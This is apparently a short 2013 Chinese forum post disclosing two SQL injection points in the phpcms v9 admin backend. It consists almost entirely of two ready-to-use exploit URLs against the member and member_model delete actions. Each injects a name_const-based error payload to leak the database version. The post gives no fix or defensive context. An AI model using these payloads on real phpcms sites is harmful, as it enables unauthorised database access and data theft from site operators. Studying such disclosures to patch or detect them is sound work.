admin 发表于 2013-7-27 18:33:32

phpcms两处后台的SQL注入

(一):
http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&idpostuserid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)


(二):http://www.0day5.com/phpcmsv9/index.php?m=member&c=member_model&a=delete&pc_hash=GlyB7Gpostmodelid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
页: [1]
查看完整版本: phpcms两处后台的SQL注入